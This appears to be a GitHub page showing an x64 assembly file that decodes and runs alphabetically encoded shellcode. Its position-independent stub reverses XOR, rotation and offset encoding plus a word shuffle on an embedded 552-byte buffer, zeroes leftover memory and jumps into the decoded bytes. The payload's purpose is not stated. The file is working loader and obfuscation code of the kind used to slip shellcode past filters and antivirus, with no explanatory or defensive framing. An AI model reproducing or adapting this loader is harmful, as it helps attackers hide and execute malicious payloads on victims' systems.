-
Notifications
You must be signed in to change notification settings - Fork 25
Expand file tree
/
Copy pathAlphabeticalShellcodeDecode.asm
More file actions
157 lines (126 loc) · 7.22 KB
/
AlphabeticalShellcodeDecode.asm
File metadata and controls
157 lines (126 loc) · 7.22 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
[BITS 64]
AlphabeticalDecode:
; Save non-volatile registers
push rbx
push rsi
push rdi
push rbp
mov rbp, rsp
; Get pointer to buffer
; use call/pop technique for position independence
call .get_buffer_addr
.get_buffer_addr:
pop rsi ; RSI = address of this instruction
add rsi, (EncodedBuffer - .get_buffer_addr) ; Adjust to point to buffer
; Static size matching the buffer
mov ebx, BUFFER_SIZE
; Calculate number of WORDs to process
mov edi, ebx
shr edi, 1 ; edi = encoded_size / 2
; Initialize loop counter
xor ecx, ecx ; ecx = 0 (loop counter)
.DecodeLoop:
cmp ecx, edi ; Compare i with decoded_size
jae .DecodeComplete
; Load WORD from encoded shellcode
movzx eax, word [rsi + rcx*2]
; Extract bTransformed (lower byte) and bOffset (upper byte)
mov r8b, al ; r8b = bTransformed
shr eax, 8 ; Shift to get upper byte
mov r9b, al ; r9b = bOffset
; Reverse the encoding operations
xor r8b, XOR_KEY ; XOR with constant
ror r8b, 4 ; Rotate right by 4
sub r8b, r9b ; Subtract offset
; Store decoded byte in-place
mov byte [rsi + rcx], r8b ; Store at index i
inc ecx ; i++
jmp short .DecodeLoop
.DecodeComplete:
; Reverse the DWORD shuffle
mov eax, edi ; eax = decoded size (in bytes)
and eax, 0FFFFFFFCh ; Round down to nearest multiple of 4
shr eax, 2 ; Divide by 4 to get DWORD count
xor ecx, ecx ; i = 0
.ShuffleLoop:
cmp ecx, eax
jae .ShuffleComplete
; Load DWORD from the decoded portion
mov edx, dword [rsi + rcx*4]
; Swap upper and lower WORD
rol edx, 16 ; Rotate left by 16
; Store back
mov dword [rsi + rcx*4], edx
inc ecx ; i++
jmp short .ShuffleLoop
.ShuffleComplete:
; Clear the unused portion of the buffer
; EDI still contains the decoded size
push rdi ; Save decoded size
push rsi ; Save buffer pointer
; Calculate start of unused portion
mov rax, rsi ; Buffer start
add rax, rdi ; Add decoded size to get start of unused portion
; Calculate size to clear (encoded_size - decoded_size = decoded_size)
mov rcx, rdi ; Size to clear = decoded_size
; Clear the unused bytes
xor rdx, rdx ; Zero to write
.ClearLoop:
test rcx, rcx ; Check if done
jz .ClearComplete
mov byte [rax], dl ; Write zero
inc rax ; Next byte
dec rcx ; Decrement counter
jmp short .ClearLoop
.ClearComplete:
pop rsi ; Restore buffer pointer
pop rdi ; Restore decoded size
; Restore registers
mov rsp, rbp
pop rbp
pop rdi
; Save the decoded buffer pointer
mov rax, rsi
pop rsi
pop rbx
; Jump to decoded shellcode
jmp rax
; The actual size of your encoded buffer is 552 bytes
BUFFER_SIZE equ 0x228
XOR_KEY equ 0xAB
EncodedBuffer:
db 0x67, 0x49, 0x4E, 0x7A, 0x6F, 0x50, 0x42, 0x56, 0x69, 0x6C, 0x6D, 0x6C, 0x58, 0x4F, 0x6E, 0x74
db 0x61, 0x6B, 0x70, 0x6C, 0x4D, 0x6E, 0x6F, 0x4C, 0x67, 0x7A, 0x62, 0x4B, 0x61, 0x6B, 0x62, 0x4C
db 0x62, 0x6B, 0x6A, 0x4A, 0x61, 0x56, 0x51, 0x67, 0x67, 0x41, 0x61, 0x5A, 0x66, 0x77, 0x70, 0x75
db 0x66, 0x51, 0x62, 0x4A, 0x67, 0x6C, 0x70, 0x75, 0x65, 0x61, 0x62, 0x4A, 0x63, 0x74, 0x63, 0x44
db 0x66, 0x51, 0x67, 0x5A, 0x6D, 0x4C, 0x70, 0x75, 0x6E, 0x4D, 0x6B, 0x55, 0x70, 0x6D, 0x62, 0x54
db 0x43, 0x41, 0x62, 0x6B, 0x73, 0x43, 0x70, 0x73, 0x6C, 0x4B, 0x69, 0x6C, 0x6A, 0x53, 0x62, 0x54
db 0x67, 0x6B, 0x67, 0x50, 0x75, 0x41, 0x63, 0x50, 0x6D, 0x4C, 0x63, 0x4B, 0x6F, 0x4A, 0x4D, 0x42
db 0x4F, 0x41, 0x63, 0x4B, 0x69, 0x6B, 0x68, 0x73, 0x68, 0x5A, 0x68, 0x4F, 0x6F, 0x4B, 0x69, 0x6B
db 0x70, 0x6C, 0x41, 0x66, 0x67, 0x7A, 0x63, 0x4B, 0x6D, 0x4C, 0x65, 0x61, 0x64, 0x71, 0x61, 0x5A
db 0x61, 0x64, 0x6F, 0x4B, 0x53, 0x4D, 0x61, 0x70, 0x65, 0x6C, 0x64, 0x74, 0x6A, 0x4C, 0x67, 0x41
db 0x6F, 0x4C, 0x61, 0x64, 0x6F, 0x4C, 0x4D, 0x6E, 0x50, 0x4B, 0x61, 0x45, 0x64, 0x77, 0x6B, 0x4C
db 0x5A, 0x4F, 0x70, 0x6D, 0x51, 0x67, 0x6F, 0x4B, 0x6C, 0x64, 0x70, 0x79, 0x66, 0x51, 0x61, 0x64
db 0x6D, 0x4C, 0x70, 0x74, 0x66, 0x51, 0x63, 0x4C, 0x6F, 0x69, 0x61, 0x56, 0x6D, 0x6B, 0x6A, 0x4C
db 0x68, 0x73, 0x61, 0x6B, 0x62, 0x54, 0x6F, 0x4D, 0x64, 0x74, 0x43, 0x46, 0x66, 0x51, 0x43, 0x5A
db 0x62, 0x4F, 0x6C, 0x4B, 0x6F, 0x4B, 0x69, 0x56, 0x6C, 0x4B, 0x6B, 0x4C, 0x4A, 0x55, 0x52, 0x57
db 0x6B, 0x4B, 0x68, 0x73, 0x4B, 0x62, 0x63, 0x4B, 0x6D, 0x6B, 0x69, 0x6B, 0x4D, 0x61, 0x63, 0x4B
db 0x57, 0x5A, 0x6E, 0x6B, 0x42, 0x66, 0x6F, 0x6C, 0x73, 0x41, 0x62, 0x78, 0x71, 0x61, 0x6E, 0x59
db 0x72, 0x64, 0x6A, 0x4B, 0x6D, 0x64, 0x62, 0x57, 0x70, 0x65, 0x70, 0x79, 0x65, 0x77, 0x69, 0x54
db 0x4D, 0x4A, 0x62, 0x53, 0x65, 0x61, 0x61, 0x6C, 0x61, 0x46, 0x61, 0x6B, 0x6D, 0x6B, 0x4A, 0x4E
db 0x63, 0x44, 0x62, 0x58, 0x67, 0x41, 0x4D, 0x62, 0x4D, 0x52, 0x53, 0x46, 0x66, 0x51, 0x63, 0x4C
db 0x63, 0x4B, 0x64, 0x71, 0x6D, 0x6B, 0x68, 0x6C, 0x61, 0x64, 0x6D, 0x6B, 0x6C, 0x78, 0x46, 0x56
db 0x61, 0x54, 0x63, 0x4B, 0x6A, 0x4C, 0x63, 0x4B, 0x67, 0x73, 0x52, 0x45, 0x41, 0x56, 0x52, 0x41
db 0x61, 0x6B, 0x67, 0x73, 0x63, 0x4B, 0x61, 0x54, 0x61, 0x64, 0x67, 0x49, 0x63, 0x4B, 0x61, 0x52
db 0x41, 0x6D, 0x67, 0x7A, 0x68, 0x50, 0x63, 0x6C, 0x51, 0x57, 0x61, 0x6B, 0x6D, 0x6D, 0x69, 0x4C
db 0x62, 0x54, 0x66, 0x51, 0x70, 0x64, 0x70, 0x63, 0x67, 0x75, 0x4D, 0x6F, 0x6D, 0x5A, 0x4F, 0x65
db 0x61, 0x4F, 0x70, 0x75, 0x4D, 0x6F, 0x6F, 0x4D, 0x6D, 0x6C, 0x6F, 0x4C, 0x6B, 0x52, 0x6D, 0x6B
db 0x6D, 0x6C, 0x6F, 0x4C, 0x6D, 0x6C, 0x6D, 0x6C, 0x66, 0x4F, 0x64, 0x6F, 0x6F, 0x4C, 0x50, 0x77
db 0x6D, 0x6C, 0x6F, 0x4C, 0x6F, 0x4B, 0x6F, 0x4B, 0x6C, 0x4B, 0x65, 0x61, 0x61, 0x6B, 0x54, 0x45
db 0x6D, 0x6D, 0x5A, 0x4A, 0x66, 0x6D, 0x74, 0x76, 0x69, 0x77, 0x6B, 0x6A, 0x69, 0x71, 0x68, 0x4C
db 0x6B, 0x52, 0x65, 0x46, 0x67, 0x76, 0x63, 0x4B, 0x65, 0x4F, 0x6D, 0x6D, 0x65, 0x57, 0x44, 0x41
db 0x64, 0x79, 0x69, 0x68, 0x68, 0x67, 0x62, 0x54, 0x6D, 0x66, 0x67, 0x50, 0x63, 0x64, 0x63, 0x50
db 0x68, 0x41, 0x69, 0x4C, 0x6E, 0x52, 0x67, 0x4C, 0x74, 0x42, 0x50, 0x78, 0x67, 0x57, 0x4F, 0x49
db 0x70, 0x4E, 0x70, 0x53, 0x6D, 0x59, 0x67, 0x5A, 0x61, 0x6B, 0x44, 0x75, 0x6D, 0x6C, 0x70, 0x64
db 0x6F, 0x77, 0x66, 0x79, 0x4A, 0x44, 0x4F, 0x4F, 0x47, 0x6B, 0x62, 0x6E, 0x61, 0x4B, 0x71, 0x41
db 0x66, 0x77, 0x6F, 0x4C, 0x67, 0x67, 0x65, 0x74